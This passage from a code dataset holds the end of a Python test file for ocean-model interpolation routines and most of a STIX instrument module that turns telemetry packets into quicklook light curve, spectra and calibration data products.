coordinates\n self.inside_lons = np.array([0.9])\n self.inside_lats = np.array([1.5])\n self.outside_lons = np.array([-0.1])\n self.outside_lats = np.array([3.1])\n self.nan_lons_masked = np.ma.MaskedArray([np.nan], mask=[True])\n self.lons_masked = np.ma.MaskedArray([999., 999.], mask=[False, True])\n self.lats_masked = np.ma.MaskedArray([999., 999.], mask=[False, True])\n\n def 
test_interpolate_given_coordinates_and_depths(self):\n observed_depths = np.array([[15]])\n result = self.fixture.interpolate(self.full_field, self.inside_lons,\n self.inside_lats, observed_depths)\n expect = np.array([[1]])\n np.testing.assert_array_almost_equal(expect, result)\n\n def test_horizontal_interpolate(self):\n observed_lats, observed_lons = np.array([1]), np.array([1])\n result = self.fixture.horizontal_interpolate(self.surface_field,\n observed_lons,\n observed_lats)\n expect = [1]\n np.testing.assert_array_almost_equal(expect, result)\n\n def test_vertical_interpolate_given_section(self):\n model_section = np.array([[1, 2, 3, 4],\n [5, 6, 7, 8]])\n model_depths = np.array([[10, 20, 30, 40],\n [10, 20, 30, 40]])\n observed_depths = np.array([[15],\n [35]])\n result = self.fixture.vertical_interpolate(model_section,\n model_depths,\n observed_depths)\n expect = np.array([[1.5],\n [7.5]])\n np.testing.assert_array_almost_equal(expect, result)\n\n def test_horizontal_interpolate_given_data_outside_returns_masked(self):\n result = self.fixture.horizontal_interpolate(self.surface_field,\n self.outside_lons,\n self.outside_lats)\n expect = np.ma.masked_all((1,))\n self.assertMaskedArrayEqual(expect, result)\n\n def test_horizontal_interpolate_given_masked_lons_nan(self):\n result = self.fixture.horizontal_interpolate(self.surface_field,\n self.nan_lons_masked,\n self.outside_lats)\n expect = np.ma.masked_all((1,))\n self.assertMaskedArrayEqual(expect, result)\n\n def test_horizontal_interpolate_given_masked_positions(self):\n result = self.fixture.horizontal_interpolate(self.full_field,\n self.lons_masked,\n self.lats_masked)\n expect = np.ma.masked_all((2, 4))\n self.assertMaskedArrayEqual(expect, result)\n\n def assertMaskedArrayEqual(self, expect, result):\n self.assertEqual(expect.shape, result.shape)\n np.testing.assert_array_almost_equal(expect.compressed(),\n result.compressed())\n","sub_path":"obsoper/test/test_obsoper.py","file_name":"test_obsoper.py","file_ext":"py","file_size_in_byte":8422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"411949328","text":"\"\"\"\nHigh level STIX data products created from single stand alone packets or a sequence of packects.\n\"\"\"\nfrom datetime import timedelta, datetime\nfrom itertools import chain\n\nimport astropy.units as u\nimport numpy as np\nfrom astropy.io import fits\nfrom astropy.table import QTable, vstack, unique\nfrom astropy.time import Time\n\nfrom stix.fits.calibration.integer_compression import decompress\nfrom stix.core.stix_datetime import scet_to_datetime\nfrom stix.fits.products.common import _get_detector_mask, _get_pixel_mask, _get_energy_bins, \\\n _get_compression_scheme, _get_num_energies, _get_sub_spectrum_mask\n\n# __all__ = ['LightCurve', 'Background', 'Spectra', 'Variance', 'CalibrationSpectra',\n# 'FlareFlagAndLocation', 'TMManagementAndFlareList', 'get_energies_from_mask']\n\nENERGY_CHANNELS = {\n 0: {'channel_edge': 0, 'energy_edge': 0, 'e_lower': 0.0, 'e_upper': 4.0, 'bin_width': 4.0,\n 'dE_E': 2.000, 'ql_channel': None},\n 1: {'channel_edge': 1, 'energy_edge': 4, 'e_lower': 4.0, 'e_upper': 5.0, 'bin_width': 1.0,\n 'dE_E': 0.222, 'ql_channel': 0},\n 2: {'channel_edge': 2, 'energy_edge': 5, 'e_lower': 5.0, 'e_upper': 6.0, 'bin_width': 1.0,\n 'dE_E': 0.182, 'ql_channel': 0},\n 3: {'channel_edge': 3, 'energy_edge': 6, 'e_lower': 6.0, 'e_upper': 7.0, 'bin_width': 1.0,\n 'dE_E': 0.154, 'ql_channel': 0},\n 4: {'channel_edge': 4, 'energy_edge': 7, 
'e_lower': 7.0, 'e_upper': 8.0, 'bin_width': 1.0,\n 'dE_E': 0.133, 'ql_channel': 0},\n 5: {'channel_edge': 5, 'energy_edge': 8, 'e_lower': 8.0, 'e_upper': 9.0, 'bin_width': 1.0,\n 'dE_E': 0.118, 'ql_channel': 0},\n 6: {'channel_edge': 6, 'energy_edge': 9, 'e_lower': 9.0, 'e_upper': 10.0, 'bin_width': 1.0,\n 'dE_E': 0.105, 'ql_channel': 0},\n 7: {'channel_edge': 7, 'energy_edge': 10, 'e_lower': 10.0, 'e_upper': 11.0, 'bin_width': 1.0,\n 'dE_E': 0.095, 'ql_channel': 1},\n 8: {'channel_edge': 8, 'energy_edge': 11, 'e_lower': 11.0, 'e_upper': 12.0, 'bin_width': 1.0,\n 'dE_E': 0.087, 'ql_channel': 1},\n 9: {'channel_edge': 9, 'energy_edge': 12, 'e_lower': 12.0, 'e_upper': 13.0, 'bin_width': 1.0,\n 'dE_E': 0.080, 'ql_channel': 1},\n 10: {'channel_edge': 10, 'energy_edge': 13, 'e_lower': 13.0, 'e_upper': 14.0, 'bin_width': 1.0,\n 'dE_E': 0.074, 'ql_channel': 1},\n 11: {'channel_edge': 11, 'energy_edge': 14, 'e_lower': 14.0, 'e_upper': 15.0, 'bin_width': 1.0,\n 'dE_E': 0.069, 'ql_channel': 1},\n 12: {'channel_edge': 12, 'energy_edge': 15, 'e_lower': 15.0, 'e_upper': 16.0, 'bin_width': 1.0,\n 'dE_E': 0.065, 'ql_channel': 2},\n 13: {'channel_edge': 13, 'energy_edge': 16, 'e_lower': 16.0, 'e_upper': 18.0, 'bin_width': 1.0,\n 'dE_E': 0.061, 'ql_channel': 2},\n 14: {'channel_edge': 14, 'energy_edge': 18, 'e_lower': 18.0, 'e_upper': 20.0, 'bin_width': 2.0,\n 'dE_E': 0.105, 'ql_channel': 2},\n 15: {'channel_edge': 15, 'energy_edge': 20, 'e_lower': 20.0, 'e_upper': 22.0, 'bin_width': 2.0,\n 'dE_E': 0.095, 'ql_channel': 2},\n 16: {'channel_edge': 16, 'energy_edge': 22, 'e_lower': 22.0, 'e_upper': 25.0, 'bin_width': 3.0,\n 'dE_E': 0.128, 'ql_channel': 2},\n 17: {'channel_edge': 17, 'energy_edge': 25, 'e_lower': 25.0, 'e_upper': 28.0, 'bin_width': 3.0,\n 'dE_E': 0.113, 'ql_channel': 3},\n 18: {'channel_edge': 18, 'energy_edge': 28, 'e_lower': 28.0, 'e_upper': 32.0, 'bin_width': 4.0,\n 'dE_E': 0.133, 'ql_channel': 3},\n 19: {'channel_edge': 19, 'energy_edge': 32, 'e_lower': 32.0, 'e_upper': 36.0, 'bin_width': 4.0,\n 'dE_E': 0.118, 'ql_channel': 3},\n 20: {'channel_edge': 20, 'energy_edge': 36, 'e_lower': 36.0, 'e_upper': 40.0, 'bin_width': 4.0,\n 'dE_E': 0.105, 'ql_channel': 3},\n 21: {'channel_edge': 21, 'energy_edge': 40, 'e_lower': 40.0, 'e_upper': 45.0, 'bin_width': 5.0,\n 'dE_E': 0.118, 'ql_channel': 3},\n 22: {'channel_edge': 22, 'energy_edge': 45, 'e_lower': 45.0, 'e_upper': 50.0, 'bin_width': 5.0,\n 'dE_E': 0.105, 'ql_channel': 3},\n 23: {'channel_edge': 23, 'energy_edge': 50, 'e_lower': 50.0, 'e_upper': 56.0, 'bin_width': 6.0,\n 'dE_E': 0.113, 'ql_channel': 4},\n 24: {'channel_edge': 24, 'energy_edge': 56, 'e_lower': 56.0, 'e_upper': 63.0, 'bin_width': 7.0,\n 'dE_E': 0.118, 'ql_channel': 4},\n 25: {'channel_edge': 25, 'energy_edge': 63, 'e_lower': 63.0, 'e_upper': 70.0, 'bin_width': 7.0,\n 'dE_E': 0.105, 'ql_channel': 4},\n 26: {'channel_edge': 26, 'energy_edge': 70, 'e_lower': 70.0, 'e_upper': 76.0, 'bin_width': 6.0,\n 'dE_E': 0.082, 'ql_channel': 4},\n 27: {'channel_edge': 27, 'energy_edge': 76, 'e_lower': 76.0, 'e_upper': 84.0, 'bin_width': 8.0,\n 'dE_E': 0.100, 'ql_channel': 4},\n 28: {'channel_edge': 28, 'energy_edge': 84, 'e_lower': 84.0, 'e_upper': 100.0,\n 'bin_width': 16.0, 'dE_E': 0.174, 'ql_channel': 4},\n 29: {'channel_edge': 29, 'energy_edge': 100, 'e_lower': 100.0, 'e_upper': 120.0,\n 'bin_width': 20.0, 'dE_E': 0.182, 'ql_channel': 4},\n 30: {'channel_edge': 30, 'energy_edge': 120, 'e_lower': 120.0, 'e_upper': 150.0,\n 'bin_width': 30.0, 'dE_E': 0.222, 'ql_channel': 4},
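\n # channel 31 is the open-ended overflow bin (its upper edge is infinite)\n 31: 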
{'channel_edge': 31, 'energy_edge': 150, 'e_lower': 150.0, 'e_upper': np.inf,\n 'bin_width': np.inf, 'dE_E': np.inf, 'ql_channel': None}\n}\n\n\nclass Control(QTable):\n\n def __repr__(self):\n return f'<{self.__class__.__name__} \\n {super().__repr__()}>'\n\n def _get_time(self):\n # Replicate packet time for each sample\n base_times = Time(list(chain(\n *[[scet_to_datetime(f'{self[\"scet_coarse\"][i]}:{self[\"scet_fine\"][i]}')]\n * n for i, n in enumerate(self['num_samples'])])))\n # For each sample generate sample number and multiply by duration and apply unit\n start_delta = np.hstack(\n [(np.arange(ns) * it) for ns, it in self[['num_samples', 'integration_time']]])\n # hstack op loses unit\n start_delta = start_delta.value * self['integration_time'].unit\n\n duration = np.hstack([np.ones(num_sample) * int_time for num_sample, int_time in\n self[['num_samples', 'integration_time']]])\n duration = duration.value * self['integration_time'].unit\n\n # TODO Write out and simplify\n end_delta = start_delta + duration\n\n # Add the delta time to base times and convert to relative from start time\n times = base_times + start_delta + (end_delta - start_delta) / 2\n # times -= times[0]\n return times, duration\n\n @classmethod\n def from_packets(cls, packets):\n # Header\n control = cls()\n # self.energy_bin_mask = None\n # self.samples = None\n control['scet_coarse'] = np.array(packets['NIX00445'], np.uint32)\n # Not all QL data have fine time in TM default to 0 if no present\n scet_fine = packets.get('NIX00446')\n if scet_fine:\n control['scet_fine'] = np.array(scet_fine, np.uint32)\n else:\n control['scet_fine'] = np.zeros_like(control['scet_coarse'], np.uint32)\n\n integration_time = packets.get('NIX00405')\n if integration_time:\n control['integration_time'] = (np.array(integration_time, np.float) + 1) * 0.1 * u.s\n else:\n control['integration_time'] = np.zeros_like(control['scet_coarse'], np.float) * u.s\n\n # control = unique(control)\n control['index'] = np.arange(len(control))\n\n return control\n\n\nclass Data(QTable):\n def __repr__(self):\n return f'<{self.__class__.__name__} \\n {super().__repr__()}>'\n\n @classmethod\n def from_packets(cls, packets):\n raise NotImplementedError\n\n\nclass Product:\n def __init__(self, control, data):\n \"\"\"\n Generic product compose of control and data\n Parameters\n ----------\n control : stix_parser.products.quicklook.Control\n Table containing control information\n data : stix_parser.products.quicklook.Data\n Table containing data\n \"\"\"\n self.type = 'ql'\n self.control = control\n self.data = data\n\n self.obs_beg = self.data['time'][0] - self.control['integration_time'][0] / 2\n self.obs_end = self.data['time'][-1] + self.control['integration_time'][-1] / 2\n self.obs_avg = self.obs_beg + (self.obs_end - self.obs_beg) / 2\n\n def __add__(self, other):\n \"\"\"\n Combine two products stacking data along columns and removing duplicated data using time as\n the primary key.\n\n Parameters\n ----------\n other : A subclass of stix_parser.products.quicklook.Product\n\n Returns\n -------\n A subclass of stix_parser.products.quicklook.Product\n The combined data product\n \"\"\"\n if not isinstance(other, type(self)):\n raise TypeError(f'Products must of same type not {type(self)} and {type(other)}')\n\n # TODO reindex and update data control_index\n other.control['index'] = other.control['index'] + self.control['index'].max() + 1\n control = vstack((self.control, other.control))\n # control = unique(control, keys=['scet_coarse', 
'scet_fine'])\n # control = control.group_by(['scet_coarse', 'scet_fine'])\n\n other.data['control_index'] = other.data['control_index'] + self.control['index'].max() + 1\n data = vstack((self.data, other.data))\n data = unique(data, keys='time')\n # data = data.group_by('time')\n unique_control_inds = np.unique(data['control_index'])\n control = control[np.isin(control['index'], unique_control_inds)]\n\n return type(self)(control, data)\n\n def __repr__(self):\n return f'<{self.__class__.__name__}\\n' \\\n f' {self.control.__repr__()}\\n' \\\n f' {self.data.__repr__()}\\n' \\\n f'>'\n\n def to_days(self):\n days = set([(t.year, t.month, t.day) for t in self.data['time'].to_datetime()])\n date_ranges = [(datetime(*day), datetime(*day) + timedelta(days=1)) for day in days]\n for dstart, dend in date_ranges:\n i = np.where((self.data['time'] >= dstart) &\n (self.data['time'] < dend))\n\n data = self.data[i]\n control_indices = np.unique(data['control_index'])\n control = self.control[np.isin(self.control['index'], control_indices)]\n control_index_min = control_indices.min()\n\n data['control_index'] = data['control_index'] - control_index_min\n control['index'] = control['index'] - control_index_min\n yield type(self)(control=control, data=data)\n\n @classmethod\n def from_packets(cls, packets, eng_packets):\n control = Control.from_packets(packets)\n data = Data.from_packets(packets)\n return cls(control, data)\n\n @classmethod\n def from_fits(cls, fitspath):\n header = fits.getheader(fitspath)\n control = QTable.read(fitspath, hdu='CONTROL')\n data = QTable.read(fitspath, hdu='DATA')\n obs_beg = Time(header['DATE_OBS'])\n data['time'] = (data['time'] + obs_beg)\n return cls(control=control, data=data)\n\n def get_energies(self):\n if 'energy_bin_edge_mask' in self.control.colnames:\n energies = get_energies_from_mask(self.control['energy_bin_edge_mask'][0])\n elif 'energy_bin_mask' in self.control.colnames:\n energies = get_energies_from_mask(self.control['energy_bin_mask'][0])\n else:\n energies = get_energies_from_mask()\n\n return energies\n\n\nclass LightCurve(Product):\n \"\"\"\n Quick Look Light Curve data product.\n \"\"\"\n def __init__(self, control=None, data=None):\n super().__init__(control=control, data=data)\n self.name = 'lightcurve'\n self.level = 'L1A'\n\n @classmethod\n def from_packets(cls, packets, eng_packets):\n control = Control.from_packets(packets)\n control['detector_mask'] = _get_detector_mask(packets)\n control['pixel_mask'] = _get_pixel_mask(packets)\n control['energy_bin_edge_mask'] = _get_energy_bins(packets, 'NIX00266', 'NIXD0107')\n control['compression_scheme_counts_skm'] = \\\n _get_compression_scheme(packets, 'NIXD0101', 'NIXD0102', 'NIXD0103')\n control['compression_scheme_triggers_skm'] = \\\n _get_compression_scheme(packets, 'NIXD0104', 'NIXD0105', 'NIXD0106')\n control['num_energies'] = _get_num_energies(packets)\n control['num_samples'] = np.array(packets['NIX00271'])[\n np.cumsum(control['num_energies']) - 1]\n\n time, duration = control._get_time()\n # Map a given entry back to the control info through index\n control_indices = np.hstack([np.full(ns, cind) for ns, cind in\n control[['num_samples', 'index']]])\n\n cs, ck, cm = control['compression_scheme_counts_skm'][0]\n counts, counts_var = decompress(packets['NIX00272'], s=cs, k=ck, m=cm, return_variance=True)\n\n ts, tk, tm = control['compression_scheme_triggers_skm'][0]\n triggers, triggers_var = decompress(packets['NIX00274'], s=ts, k=tk, m=tm,\n return_variance=True)\n\n flat_indices = 
np.hstack((0, np.cumsum([*control['num_samples']]) *\n control['num_energies'])).astype(int)\n counts_reformed = [\n np.array(counts[flat_indices[i]:flat_indices[i + 1]]).reshape(n_eng, n_sam)\n for i, (n_sam, n_eng) in enumerate(control[['num_samples', 'num_energies']])]\n\n counts_var_reformed = [\n np.array(counts_var[flat_indices[i]:flat_indices[i + 1]]).reshape(n_eng, n_sam)\n for i, (n_sam, n_eng) in enumerate(control[['num_samples', 'num_energies']])]\n\n counts = np.hstack(counts_reformed).T\n counts_var = np.hstack(counts_var_reformed).T\n\n data = Data()\n data['control_index'] = control_indices\n data['time'] = time\n data['timedel'] = duration\n data['triggers'] = triggers\n data['triggers_err'] = np.sqrt(triggers_var)\n data['rcr'] = packets['NIX00276']\n data['counts'] = counts * u.ct\n data['counts_err'] = np.sqrt(counts_var) * u.ct\n\n return cls(control=control, data=data)\n\n def __repr__(self):\n return f'{self.name}, {self.level}\\n' \\\n f'{self.obs_beg.fits}, {self.obs_end}\\n ' \\\n f'{len(self.control)}, {len(self.data)}'\n\n\nclass Background(Product):\n \"\"\"\n Background product.\n \"\"\"\n\n def __init__(self, control, data):\n super().__init__(control=control, data=data)\n self.name = 'background'\n self.level = 'L1A'\n\n @classmethod\n def from_packets(cls, packets, eng_packets):\n control = Control.from_packets(packets)\n\n # Control\n control['energy_bin_mask'] = _get_energy_bins(packets, 'NIX00266', 'NIXD0111')\n control['compression_scheme_background_skm'] = _get_compression_scheme(packets, 'NIXD0108',\n 'NIXD0109',\n 'NIXD0110')\n control['compression_scheme_triggers_skm'] = _get_compression_scheme(packets, 'NIXD0112',\n 'NIXD0113', 'NIXD0114')\n\n control['num_energies'] = _get_num_energies(packets)\n control['num_samples'] = np.array(packets['NIX00277'])[\n np.cumsum(control['num_energies']) - 1]\n\n time, duration = control._get_time()\n # Map a given entry back to the control info through index\n control_indices = np.hstack([np.full(ns, cind) for ns, cind in\n control[['num_samples', 'index']]])\n\n # Data\n bs, bk, bm = control['compression_scheme_background_skm'][0]\n counts, counts_var = decompress(packets['NIX00278'], s=bs, k=bk, m=bm, return_variance=True)\n\n flat_indices = np.hstack((0, np.cumsum([*control['num_samples']]) *\n control['num_energies'])).astype(int)\n\n counts_reformed = [\n np.array(counts[flat_indices[i]:flat_indices[i + 1]]).reshape(n_eng, n_sam)\n for i, (n_sam, n_eng) in enumerate(control[['num_samples', 'num_energies']])]\n\n counts_var_reformed = [\n np.array(counts_var[flat_indices[i]:flat_indices[i + 1]]).reshape(n_eng, n_sam)\n for i, (n_sam, n_eng) in enumerate(control[['num_samples', 'num_energies']])]\n\n counts = np.hstack(counts_reformed).T\n counts_var = np.hstack(counts_var_reformed).T\n\n ts, tk, tm = control['compression_scheme_triggers_skm'][0]\n triggers, triggers_var = decompress(packets['NIX00274'], s=ts, k=tk, m=tm,\n return_variance=True)\n\n data = Data()\n data['control_index'] = control_indices\n data['time'] = time\n data['timedel'] = duration\n data['background'] = counts * u.ct\n data['background_err'] = np.sqrt(counts_var) * u.ct\n data['triggers'] = triggers\n data['triggers_err'] = np.sqrt(triggers_var)\n\n return cls(control=control, data=data)\n\n\nclass Spectra(Product):\n \"\"\"\n Spectra product.\n \"\"\"\n\n def __init__(self, control, data):\n super().__init__(control=control, data=data)\n self.name = 'spectra'\n self.level = 'L1A'\n\n @classmethod\n def from_packets(cls, packets, 
eng_packets):\n        # Header\n        control = Control.from_packets(packets)\n\n        # Control\n        control['pixel_mask'] = _get_pixel_mask(packets)\n        control['compression_scheme_spectra_skm'] = _get_compression_scheme(packets, 'NIXD0115',\n                                                                            'NIXD0116', 'NIXD0117')\n        control['compression_scheme_triggers_skm'] = _get_compression_scheme(packets, 'NIXD0112',\n                                                                             'NIXD0113', 'NIXD0114')\n        # Fixed for spectra\n        num_energies = 32\n        control['num_energies'] = num_energies\n        control['num_samples'] = np.array(packets['NIX00089'])\n\n        # Due to the way packets are split up full contiguous blocks of detector 1-32 are not always\n        # down-linked to the ground so need to pad the array to write to table and later fits\n        total_samples = control['num_samples'].sum()\n        full, partial = divmod(total_samples, 32)\n        pad_after = 0\n        if partial != 0:\n            pad_after = 32 - partial\n\n        control_indices = np.pad(np.hstack([np.full(ns, cind) for ns, cind in\n                                            control[['num_samples', 'index']]]), (0, pad_after),\n                                 constant_values=-1)\n        control_indices = control_indices.reshape(-1, 32)\n\n        duration, time = cls._get_time(control, num_energies, packets, pad_after)\n\n        # sample x detector x energy\n        # counts = np.array([eng_packets.get('NIX00{}'.format(i)) for i in range(452, 484)],\n        #                   np.uint32).T * u.ct\n        ss, sk, sm = control['compression_scheme_spectra_skm'][0]\n        counts, counts_var = zip(\n            *[decompress(packets.get('NIX00{}'.format(i)), s=ss, k=sk, m=sm, return_variance=True)\n              for i in range(452, 484)])\n        counts = np.vstack(counts).T\n        counts_var = np.vstack(counts_var).T\n\n        counts = np.pad(counts, ((0, pad_after), (0, 0)), constant_values=0)\n        counts_var = np.pad(counts_var, ((0, pad_after), (0, 0)), constant_values=0)\n\n        ts, tk, tm = control['compression_scheme_triggers_skm'][0]\n        triggers, triggers_var = decompress(packets.get('NIX00484'), s=ts, k=tk, m=tm,\n                                            return_variance=True)\n\n        triggers = np.pad(triggers, (0, pad_after), constant_values=0)\n        triggers_var = np.pad(triggers_var, (0, pad_after), constant_values=0)\n\n        detector_index = np.pad(np.array(packets.get('NIX00100'), np.int16), (0, pad_after),\n                                constant_values=-1)\n        num_integrations = np.pad(np.array(packets.get('NIX00485'), np.uint16), (0, pad_after),\n                                  constant_values=0)\n\n        # Data\n        data = Data()\n        data['control_index'] = control_indices[:, 0]\n        data['time'] = time[:, 0]\n        data['timedel'] = duration[:, 0]\n        data['detector_index'] = detector_index.reshape(-1, 32)\n        data['spectra'] = counts.reshape(-1, 32, num_energies) * u.ct\n        data['spectra_err'] = np.sqrt(counts_var.reshape(-1, 32, num_energies))\n        data['triggers'] = triggers.reshape(-1, num_energies)\n        data['triggers_err'] = np.sqrt(triggers_var.reshape(-1, num_energies))\n        data['num_integrations'] = num_integrations.reshape(-1, num_energies)\n\n        return cls(control=control, data=data)\n\n    @classmethod\n    def _get_time(cls, control, num_energies, packets, pad_after):\n        times = []\n        durations = []\n        start = 0\n        for i, (ns, it) in enumerate(control['num_samples', 'integration_time']):\n            off_sets = np.array(packets.get('NIX00485')[start:start + ns]) * it\n            base_time = Time(scet_to_datetime(\n                f'{control[\"scet_coarse\"][i]}:{control[\"scet_fine\"][i]}'))\n            start_times = base_time + off_sets\n            end_times = base_time + off_sets + it\n            cur_time = start_times + (end_times - start_times) / 2\n            times.extend(cur_time)\n            durations.extend([it]*ns)\n            start += ns\n        time = Time(times)\n        time = Time(np.pad(time.datetime64, (0, pad_after), constant_values=time[-1].datetime64))\n        time = time.reshape(-1, num_energies)\n        duration = 
np.pad(np.hstack(durations), (0, pad_after)).reshape(-1, num_energies) * it.unit\n return duration, time\n\n\nclass Variance(Product):\n \"\"\"\n Variance product.\n \"\"\"\n def __init__(self, control, data):\n super().__init__(control=control, data=data)\n self.name = 'variance'\n self.level = 'L1A'\n\n @classmethod\n def from_packets(cls, packets, eng_packets):\n # Header\n control = Control.from_packets(packets)\n\n # Control\n control['samples_per_variance'] = np.array(packets.get('NIX00279'), np.ubyte)\n control['pixel_mask'] = _get_pixel_mask(packets)\n control['detector_mask'] = _get_detector_mask(packets)\n control['compression_scheme_variance_skm'] = _get_compression_scheme(packets, 'NIXD0118',\n 'NIXD0119', 'NIXD0120')\n energy_masks = np.array([\n [bool(int(x)) for x in format(packets.get('NIX00282')[i], '032b')]\n for i in range(len(packets.get('NIX00282')))])\n\n control['energy_bin_mask'] = energy_masks\n control['num_energies'] = 1\n control['num_samples'] = packets.get('NIX00280')\n\n time, duration = control._get_time()\n # Map a given entry back to the control info through index\n control_indices = np.hstack([np.full(ns, cind) for ns, cind in\n control[['num_samples', 'index']]])\n\n vs, vk, vm = control['compression_scheme_variance_skm'][0]\n variance, variance_var = decompress(packets.get('NIX00281'), s=vs, k=vk, m=vm,\n return_variance=True)\n\n # Data\n data = Data()\n data['time'] = time\n data['timedel'] = duration\n data['control_index'] = control_indices\n data['variance'] = variance\n data['variance_err'] = np.sqrt(variance_var)\n\n return cls(control=control, data=data)\n\n\nclass CalibrationSpectra(Product):\n \"\"\"\n Calibration Spectra data product.\n \"\"\"\n def __init__(self, control, data):\n super().__init__(control=control, data=data)\n self.name = 'calibration_spectrum'\n self.level = 'L1A'\n\n @classmethod\n def from_packets(cls, packets, eng_packets):\n control = Control.from_packets(packets)\n\n control['integration_time'] = (np.array(packets['NIX00122'], np.uint32) + 1) * 0.1 * u.s\n # control['obs_beg'] = control['obs_utc']\n # control['.obs_end'] = control['obs_beg'] + timedelta(seconds=control['duration'].astype('float'))\n # control['.obs_avg'] = control['obs_beg'] + (control['obs_end'] - control['obs_beg']) / 2\n\n # Control\n control['quiet_time'] = np.array(packets['NIX00123'], np.uint16)\n control['live_time'] = np.array(packets['NIX00124'], np.uint32)\n control['average_temperature'] = np.array(packets['NIX00125'], np.uint16)\n control['detector_mask'] = _get_detector_mask(packets)\n control['pixel_mask'] = _get_pixel_mask(packets)\n control['subspectrum_mask'] = _get_sub_spectrum_mask(packets)\n control['compression_scheme_counts_skm'] = _get_compression_scheme(packets, 'NIXD0126',\n 'NIXD0127', 'NIXD0128')\n subspec_data = {}\n j = 129\n for subspec, i in enumerate(range(300, 308)):\n subspec_data[subspec + 1] = {'num_points': packets.get(f'NIXD0{j}')[0],\n 'num_summed_channel': packets.get(f'NIXD0{j + 1}')[0],\n 'lowest_channel': packets.get(f'NIXD0{j + 2}')[0]}\n j += 3\n\n control['num_samples'] = np.array(packets.get('NIX00159'), np.uint16)\n # control.remove_column('index')\n # control = unique(control)\n # control['index'] = np.arange(len(control))\n\n control['subspec_num_points'] = np.array(\n [v['num_points'] for v in subspec_data.values()]).reshape(1, -1)\n control['subspec_num_summed_channel'] = np.array(\n [v['num_summed_channel'] for v in subspec_data.values()]).reshape(1, -1)\n control['subspec_lowest_channel'] = 
np.array(\n            [v['lowest_channel'] for v in subspec_data.values()]).reshape(1, -1)\n\n        subspec_index = np.argwhere(control['subspectrum_mask'][0].flatten() == 1)\n        num_sub_spectra = control['subspectrum_mask'].sum(axis=1)\n        sub_channels = [np.arange(control['subspec_num_points'][0, index] + 1)\n                        * (control['subspec_num_summed_channel'][0, index] + 1)\n                        + control['subspec_lowest_channel'][0, index] for index in subspec_index]\n        channels = list(chain(*[ch.tolist() for ch in sub_channels]))\n        control['num_channels'] = len(channels)\n\n        # Data\n        data = Data()\n        data['control_index'] = [0]\n        data['time'] = (Time(scet_to_datetime(f\"{control['scet_coarse'][0]}\"\n                                              f\":{control['scet_fine'][0]}\"))\n                        + control['integration_time'][0]/2).reshape(1)\n        data['timedel'] = control['integration_time'][0]\n        # data['detector_id'] = np.array(packets.get('NIXD0155'), np.ubyte)\n        # data['pixel_id'] = np.array(packets.get('NIXD0156'), np.ubyte)\n        # data['subspec_id'] = np.array(packets.get('NIXD0157'), np.ubyte)\n        num_spec_points = np.array(packets.get('NIX00146'))\n\n        cs, ck, cm = control['compression_scheme_counts_skm'][0]\n        counts, counts_var = decompress(packets.get('NIX00158'), s=cs, k=ck, m=cm,\n                                        return_variance=True)\n\n\n        counts_rebinned = np.apply_along_axis(rebin_proportional, 1,\n                                              counts.reshape(-1, len(channels)), channels,\n                                              np.arange(1025))\n\n        counts_var_rebinned = np.apply_along_axis(rebin_proportional, 1,\n                                                  counts_var.reshape(-1, len(channels)), channels,\n                                                  np.arange(1025))\n\n        dids = np.array(packets.get('NIXD0155'), np.ubyte).reshape(-1, num_sub_spectra[0])[:, 0]\n        pids = np.array(packets.get('NIXD0156'), np.ubyte).reshape(-1, num_sub_spectra[0])[:, 0]\n\n        full_counts = np.zeros((32, 12, 1024))\n        full_counts[dids, pids] = counts_rebinned\n        full_counts_var = np.zeros((32, 12, 1024))\n        full_counts_var[dids, pids] = counts_var_rebinned\n        data['counts'] = full_counts.reshape((1, *full_counts.shape))\n        data['counts_err'] = np.sqrt(full_counts_var).reshape((1, *full_counts_var.shape))\n\n        return cls(control=control, data=data)\n\n\nclass FlareFlagAndLocation(Product):\n    \"\"\"\n    Flare flag and location product\n    \"\"\"\n    def __init__(self, control, data):\n        super().__init__(control=control, data=data)\n        self.name = 'flareflag'\n        self.level = 'L1A'\n\n    @classmethod\n    def from_packets(cls, packets, eng_packets):\n        control = Control.from_packets(packets)\n        control['num_samples'] = packets.get('NIX00089')\n\n        control_indices = np.hstack([np.full(ns, cind) for ns, cind in\n                                     control[['num_samples', 'index']]])\n\n        time, duration = control._get_time()\n\n        # DATA\n        data = Data()\n        data['control_index'] = control_indices\n        data['time'] = time\n        data['duration'] = duration\n        data['loc_z'] = np.array(packets['NIX00283'], np.int16)\n        data['loc_y'] = np.array(packets['NIX00284'], np.int16)\n        data['thermal_index'] = np.array(packets['NIXD0061'], np.uint16)\n        data['non_thermal_index'] = np.array(packets['NIXD0060'], np.uint16)\n        data['location_status'] = np.array(packets['NIXD0059'], np.uint16)\n\n        return cls(control=control, data=data)\n\n\nclass TMManagementAndFlareList(Product):\n    \"\"\"\n    TM Management and Flare list product.\n    \"\"\"\n    def __init__(self, control, data):\n        super().__init__(control=control, data=data)\n        self.name = 'flareflag'\n        self.level = 'L1A'\n\n    @classmethod\n    def from_packets(cls, packets, eng_packets):\n        tmp = QTable()\n        tmp['scet_coarse'] = packets['coarse_time']\n        tmp['scet_fine'] = packets['fine_time']\n        control = Control(tmp)\n        data = Data()\n        if 'parameters' in packets:\n\n            
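# The flare-list telemetry is optional: read the counters and flare summary only when the packets carry parameters; otherwise from_packets returns None below.\n            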
control['ubsd_counter'] = packets.get('NIX00285')[0]\n            control['pald_counter'] = packets.get('NIX00286')[0]\n            control['num_samples'] = packets.get('NIX00286')[0]\n\n            # DATA\n            data['start_scet_coarse'] = packets.get('NIX00287')\n            data['end_scet_coarse'] = packets.get('NIX00287')\n            data['obs_utc'] = scet_to_datetime(f\"{data['start_scet_coarse']}:0\")\n            data['highest_flareflag'] = packets.get('NIX00289')[0]\n            data['tm_byte_volume'] = packets.get('NIX00290')[0]\n            data['average_z_loc'] = packets.get('NIX00291')[0]\n            data['average_y_loc'] = packets.get('NIX00292')[0]\n            data['processing_mask'] = packets.get('NIX00293')[0]\n\n            return cls(control=control, data=data)\n        else:\n            return None\n\n\ndef get_energies_from_mask(mask=None):\n    \"\"\"\n    Return the lower and upper energy edges selected by the given energy bin mask.\n\n    Parameters\n    ----------\n    mask : list or array\n        Energy bin mask\n\n    Returns\n    -------\n    tuple\n        Lower and upper energy edges\n    \"\"\"\n\n    if mask is None:\n        low = [ENERGY_CHANNELS[edge]['e_lower'] for edge in range(32)]\n        high = [ENERGY_CHANNELS[edge]['e_upper'] for edge in range(32)]\n    elif len(mask) == 33:\n        edges = np.where(np.array(mask) == 1)[0]\n        channel_edges = [edges[i:i + 2].tolist() for i in range(len(edges) - 1)]\n   